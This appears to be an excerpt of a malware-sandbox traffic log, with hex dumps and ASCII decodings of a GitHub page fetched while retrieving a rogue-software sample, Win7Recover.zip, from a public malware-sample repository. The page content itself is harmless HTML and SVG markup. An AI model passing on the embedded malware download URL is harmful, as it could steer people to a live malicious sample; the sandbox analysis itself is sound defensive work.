                                                                                                        2022-09-29 12:46:50 UTC16063INData Raw: 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69
                                                                                                        Data Ascii: rossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossori
                                                                                                        2022-09-29 12:46:50 UTC16064INData Raw: 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 6b 30 51 6b 45 36 4d 7a 63 33 51 7a 6f 79 4f 45 45 33 4e 6b 5a 42 4f 6a 49 35 4f 54 55 78 4e 7a 51 36 4e 6a 4d 7a 4e 54 6b 7a 51 6a 6b 69 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4e 6a 49 79 4e 54 45 35 4d 44 67 78 4d 7a 41 33 4d 44 55 77 4f 54 4d 34 49 69 77 69 63 6d 56 6e 61 57 39 75 58 32 56 6b 5a 32 55 69 4f 69 4a 6d 63 6d 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 63 6d 56 75 5a 47 56 79 49 6a 6f 69 61 57 46 6b 49 6e 30 3d 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d
                                                                                                        Data Ascii: e="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6Ijk0QkE6Mzc3QzoyOEE3NkZBOjI5OTUxNzQ6NjMzNTkzQjkiLCJ2aXNpdG9yX2lkIjoiNjIyNTE5MDgxMzA3MDUwOTM4IiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fcmVuZGVyIjoiaWFkIn0=" data-turbo-transient="true" /><m
                                                                                                        2022-09-29 12:46:50 UTC16065INData Raw: 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 69 74 48 75 62 20 69 73 20 77 68 65 72 65 20 70 65 6f 70 6c 65 20 62 75 69 6c 64 20 73 6f 66 74 77 61 72 65 2e 20 4d 6f 72 65 20 74 68 61 6e 20 38 33 20 6d 69 6c 6c 69 6f 6e 20 70 65 6f 70 6c 65 20 75 73 65 20 47 69 74 48 75 62 20 74 6f 20 64 69 73 63 6f 76 65 72 2c 20 66 6f 72 6b 2c 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 20 74 6f 20 6f 76 65 72 20 32 30 30 20 6d 69 6c 6c 69 6f 6e 20 70 72 6f 6a 65 63 74 73 2e 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 65 61 72 63 68 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 70 65 6e 73 65 61 72 63 68 64 65 73 63 72 69 70 74 69 6f 6e 2b 78 6d
                                                                                                        Data Ascii: <meta name="description" content="GitHub is where people build software. More than 83 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <link rel="search" type="application/opensearchdescription+xm
                                                                                                        2022-09-29 12:46:50 UTC16067INData Raw: 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 6f 70 65 6e 5f 67 72 61 70 68 2f 67 69 74 68 75 62 2d 6f 63 74 6f 63 61 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 70 6e
                                                                                                        Data Ascii: age:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="image/pn
                                                                                                        2022-09-29 12:46:50 UTC16068INData Raw: 66 65 61 74 75 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 43 54 49 4f 4e 53 5f 52 55 4e 5f 4e 41 4d 45 2c 49 4d 41 47 45 5f 4d 45 54 52 49 43 5f 54 52 41 43 4b 49 4e 47 2c 47 45 4f 4a 53 4f 4e 5f 41 5a 55 52 45 5f 4d 41 50 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 2c 53 54 52 49 43 54 5f 44 45 46 45 52 52 45 44 5f 44 49 46 46 5f 4c 49 4e 45 53 5f 43 48 45 43 4b 53 5f 52 45 50 4f 52 54 49 4e 47 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 31 31 35 62 32 35 39 65 66 37 62 35 39 64 36 37 33 38 35 64 62 38 33 35 61 33 65 61 34 36 61 31 65 65 31 34 61 63 38 30 32 66 31 35 65 30 30 63 38 61
                                                                                                        Data Ascii: features" content="ACTIONS_RUN_NAME,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS,STRICT_DEFERRED_DIFF_LINES_CHECKS,STRICT_DEFERRED_DIFF_LINES_CHECKS_REPORTING"> <meta http-equiv="x-pjax-version" content="e115b259ef7b59d67385db835a3ea46a1ee14ac802f15e00c8a
                                                                                                        2022-09-29 12:46:50 UTC16069INData Raw: 74 65 2f 62 72 6f 77 73 65 72 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 6f 70 74 69 6d 69 7a 65 6c 79 2d 63 6c 69 65 6e 74 2d 65 72 72 6f 72 73 2d 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 6f 70 74 69 6d 69 7a 65 6c 79 5f 63 6c 69 65 6e 74 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 70 69 6e 6e 65 64 2d 6f 63 74 6f 63 61 74 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 3c 6c 69 6e
                                                                                                        Data Ascii: te/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <lin
                                                                                                        2022-09-29 12:46:50 UTC16070INData Raw: 43 34 36 46 0d 0a 72 65 73 73 2d 70 6a 61 78 2d 6c 6f 61 64 65 72 20 50 72 6f 67 72 65 73 73 20 70 6f 73 69 74 69 6f 6e 2d 66 69 78 65 64 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 30 25 3b 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 50 72 6f 67 72 65 73 73 2d 69 74 65 6d 20 70 72 6f 67 72 65 73 73 2d 70 6a 61 78 2d 6c 6f 61 64 65 72 2d 62 61 72 20 6c 65 66 74 2d 30 20 74 6f 70 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 61 63 63 65 6e 74 2d 65 6d 70 68 61 73 69 73 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                        Data Ascii: C46Fress-pjax-loader Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar left-0 top-0 color-bg-accent-emphasis"></span></span> <
                                                                                                        2022-09-29 12:46:50 UTC16072INData Raw: 67 65 2c 20 69 63 6f 6e 3a 6c 6f 67 6f 2d 77 6f 72 64 6d 61 72 6b 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 33 32 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 33 32 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6d 61 72 6b 2d 67 69 74 68 75 62 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 20 30 43 33 2e 35 38 20 30 20 30 20 33 2e 35 38 20 30 20 38 63 30 20 33 2e 35 34 20 32 2e 32 39 20 36 2e 35 33 20 35 2e 34 37
                                                                                                        Data Ascii: ge, icon:logo-wordmark"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47
                                                                                                        2022-09-29 12:46:50 UTC16073INData Raw: 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 66 66 39 63 32 34 39 37 33 38 33 36 32 30 63 33 36 66 61 37 62 64 38 38 65 31 39 63 39 33 32 36 37 33 66 34 35 62 65 37 34 62 33 34 64 34 62 30 35 62 64 65 36 64 31 34 64 36 33 31 32 63 32 63 22
                                                                                                        Data Ascii: quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="ff9c2497383620c36fa7bd88e19c932673f45be74b34d4b05bde6d14d6312c2c"
                                                                                                        2022-09-29 12:46:50 UTC16074INData Raw: 65 6d 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 73 2d 68 65 61 64 65 72 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 62 6f 72 64 65 72 2d 30 20 77 69 64 74 68 2d 66 75 6c 6c 20 77 69 64 74 68 2d 6c 67 2d 61 75 74 6f 20 70 78 2d 30 20
                                                                                                        Data Ascii: em position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0
                                                                                                        2022-09-29 12:46:50 UTC16076INData Raw: 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 41 63 74 69 6f 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 77 6f 72 6b 66 6c 6f 77 20 63 6f 6c 6f 72 2d 66 67
                                                                                                        Data Ascii: MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Actions;&quot;}" href="/features/actions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg
                                                                                                        2022-09-29 12:46:50 UTC16077INData Raw: 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 61 63 6b 61 67 65 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 38 37 36 2e 36 34 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 31 2e 37 35 20 30 6c 2d 38 2e 32 35 20 34 2e 37 36 32 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 2e 38 37 35 20 31 2e 35 31 35 76 39 2e 35 32 35 63 30 20 2e 36 32 35 2e 33 33 34 20 31 2e 32 30 33 2e 38 37 35 20 31 2e 35 31 35 6c 38 2e 32 35 20 34 2e 37 36 33 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 2e 37 35 20 30 6c 38 2e 32 35
                                                                                                        Data Ascii: data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path fill-rule="evenodd" d="M12.876.64a1.75 1.75 0 00-1.75 0l-8.25 4.762a1.75 1.75 0 00-.875 1.515v9.525c0 .625.334 1.203.875 1.515l8.25 4.763a1.75 1.75 0 001.75 0l8.25
                                                                                                        2022-09-29 12:46:50 UTC16078INData Raw: 31 20 31 33 2e 31 39 6c 2d 31 2e 39 37 2d 31 2e 39 37 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 30 36 20 31 2e 30 36 6c 32 2e 35 20 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 30 36 20 30 6c 35 2d 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 35 34 2e 36 33 37 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 2d 31 2e 30 38 20 30 4c 33 2e 32 31 20 33 2e 33 31 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 34 2e 39 37 36 56 31 30 63 30 20 36 2e 31 39 20 33 2e 37 37 20 31 30 2e 37 30 35 20 39 2e 34 30 31 20 31 32 2e 38 33 2e 33 38 36 2e 31 34 35 2e 38 31 32 2e 31 34 35 20 31 2e 31 39 38 20 30 43 31 38 2e 32 32 39 20 32 30 2e 37 30 34 20 32 32 20 31 36 2e 31 39
                                                                                                        Data Ascii: 1 13.19l-1.97-1.97a.75.75 0 00-1.06 1.06l2.5 2.5a.75.75 0 001.06 0l5-5z"></path><path fill-rule="evenodd" d="M12.54.637a1.75 1.75 0 00-1.08 0L3.21 3.312A1.75 1.75 0 002 4.976V10c0 6.19 3.77 10.705 9.401 12.83.386.145.812.145 1.198 0C18.229 20.704 22 16.19
                                                                                                        2022-09-29 12:46:50 UTC16080INData Raw: 2e 37 35 76 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 38 2e 37 35 20 31 33 48 35 2e 32 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 2d 31 2e 37 35 76 2d 37 2e 35 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 37 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 31 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 48 35 2e 32 35 7a 4d 31 2e 35 20 31 35 2e 37 35 63 30 2d 2e 39 36 36 2e 37 38 34 2d 31 2e 37 35 20 31 2e 37 35 2d 31 2e 37 35 68 31 37 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 34 61 31 2e 37 35 20 31 2e 37 35 20 30 20
                                                                                                        Data Ascii: .75v7.5A1.75 1.75 0 0118.75 13H5.25a1.75 1.75 0 01-1.75-1.75v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H5.25zM1.5 15.75c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0
                                                                                                        2022-09-29 12:46:50 UTC16081INData Raw: 3d 22 4d 39 2e 37 35 20 31 34 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 7a 6d 34 2e 35 20 30 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 20 32 63 2d 32 2e 32 31 34 20 30 2d 34 2e 32 34 38 2e 36 35 37 2d 35 2e 37 34 37 20 31 2e 37 35 36 61 37 2e 34 33 20 37 2e 34 33 20 30 20 30 30 2d 2e 33 39 37 2e 33 31 32 63 2d 2e 35 38 34 2e 32 33 35 2d
                                                                                                        Data Ascii: ="M9.75 14a.75.75 0 01.75.75v2.5a.75.75 0 01-1.5 0v-2.5a.75.75 0 01.75-.75zm4.5 0a.75.75 0 01.75.75v2.5a.75.75 0 01-1.5 0v-2.5a.75.75 0 01.75-.75z"></path><path fill-rule="evenodd" d="M12 2c-2.214 0-4.248.657-5.747 1.756a7.43 7.43 0 00-.397.312c-.584.235-
                                                                                                        2022-09-29 12:46:50 UTC16082INData Raw: 30 31 34 20 31 38 2e 33 32 33 76 2d 36 2e 36 37 7a 6d 36 2e 33 30 39 2d 31 2e 30 39 32 61 32 2e 33 35 20 32 2e 33 35 20 30 20 30 31 2d 2e 33 38 2e 33 37 34 63 2d 2e 34 33 37 2e 33 34 31 2d 31 2e 30 35 34 2e 35 36 34 2d 31 2e 39 36 34 2e 35 36 34 2d 31 2e 35 37 33 20 30 2d 32 2e 32 39 32 2d 2e 33 33 37 2d 32 2e 36 35 37 2d 2e 37 35 2d 2e 31 39 32 2d 2e 32 31 38 2d 2e 33 33 31 2d 2e 35 30 36 2d 2e 34 32 33 2d 2e 38 39 2d 2e 30 39 31 2d 2e 33 38 35 2d 2e 31 33 35 2d 2e 38 36 37 2d 2e 31 33 35 2d 31 2e 34 37 32 20 30 2d 31 2e 31 34 2e 32 34 33 2d 31 2e 38 34 37 2e 37 30 35 2d 32 2e 33 32 2e 34 37 37 2d 2e 34 38 37 20 31 2e 33 31 39 2d 2e 38 36 31 20 32 2e 38 32 34 2d 31 2e 30 32 34 20 31 2e 34 38 37 2d 2e 31 36 20 32 2e 31 39 32 2e 31 33 38 20 32 2e 35 33 33
                                                                                                        Data Ascii: 014 18.323v-6.67zm6.309-1.092a2.35 2.35 0 01-.38.374c-.437.341-1.054.564-1.964.564-1.573 0-2.292-.337-2.657-.75-.192-.218-.331-.506-.423-.89-.091-.385-.135-.867-.135-1.472 0-1.14.243-1.847.705-2.32.477-.487 1.319-.861 2.824-1.024 1.487-.16 2.192.138 2.533
                                                                                                        2022-09-29 12:46:50 UTC16084INData Raw: 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 64 65 2d 72 65 76 69 65 77 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 20 36 2e 37 34 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 30 34 20 31 2e 30 36 6c 2d 32 2e 39 30 38 20 32 2e 37 20 32 2e 39 30 38 20 32 2e 37 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 32 20 31 2e 31 6c 2d 33 2e 35 2d 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 31 6c 33 2e 35 2d 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2e 30 34 7a 6d 33 2e 34 34 20 31 2e 30 36 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 32 2d 31 2e 31 6c 33 2e 35 20 33 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 31 6c 2d 33
                                                                                                        Data Ascii: s="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 01-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 11-1.02 1.1l-3.5-3.25a.75.75 0 010-1.1l3.5-3.25a.75.75 0 011.06.04zm3.44 1.06a.75.75 0 111.02-1.1l3.5 3.25a.75.75 0 010 1.1l-3
                                                                                                        2022-09-29 12:46:50 UTC16085INData Raw: 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 69 73 73 75 65 2d 6f 70 65 6e 65 64 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 2e 35 20 31 32 61 39 2e 35 20 39 2e 35 20 30 20 31 31 31 39 20 30 20 39 2e 35 20 39 2e 35 20 30 20 30 31 2d 31 39 20 30 7a 4d 31 32 20 31 43 35 2e 39 32 35 20 31 20 31 20 35 2e 39 32 35 20 31 20 31 32 73 34 2e 39 32 35 20 31 31 20 31 31 20 31 31 20 31 31 2d 34 2e 39 32 35 20 31 31 2d 31 31 53 31 38 2e 30 37 35 20 31 20 31 32 20 31 7a 6d 30 20 31 33 61 32 20 32 20 30 20 31 30 30 2d 34 20 32 20 32 20 30 20
                                                                                                        Data Ascii: ta-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path fill-rule="evenodd" d="M2.5 12a9.5 9.5 0 1119 0 9.5 9.5 0 01-19 0zM12 1C5.925 1 1 5.925 1 12s4.925 11 11 11 11-4.925 11-11S18.075 1 12 1zm0 13a2 2 0 100-4 2 2 0
                                                                                                        2022-09-29 12:46:50 UTC16086INData Raw: 2d 32 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 35 20 38 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 35 68 33 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 39 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 32 32 2e 32 35 20 32 30 48 32 31 76 31 2e 35 34 33 61 31 2e 34 35 37 20 31 2e 34 35 37 20 30 20 30 31 2d 32 2e 34 38 37 20 31 2e 30 33 4c 31 35 2e 39 33 39 20 32 30 48 31 30 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 39 20 31 38 2e 32 35 76 2d 31 2e 34 36 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76
                                                                                                        Data Ascii: -2a.25.25 0 01-.25-.25v-9.5z"></path><path d="M22.5 8.75a.25.25 0 00-.25-.25h-3.5a.75.75 0 010-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0122.25 20H21v1.543a1.457 1.457 0 01-2.487 1.03L15.939 20H10.75A1.75 1.75 0 019 18.25v-1.465a.75.75 0 011.5 0v
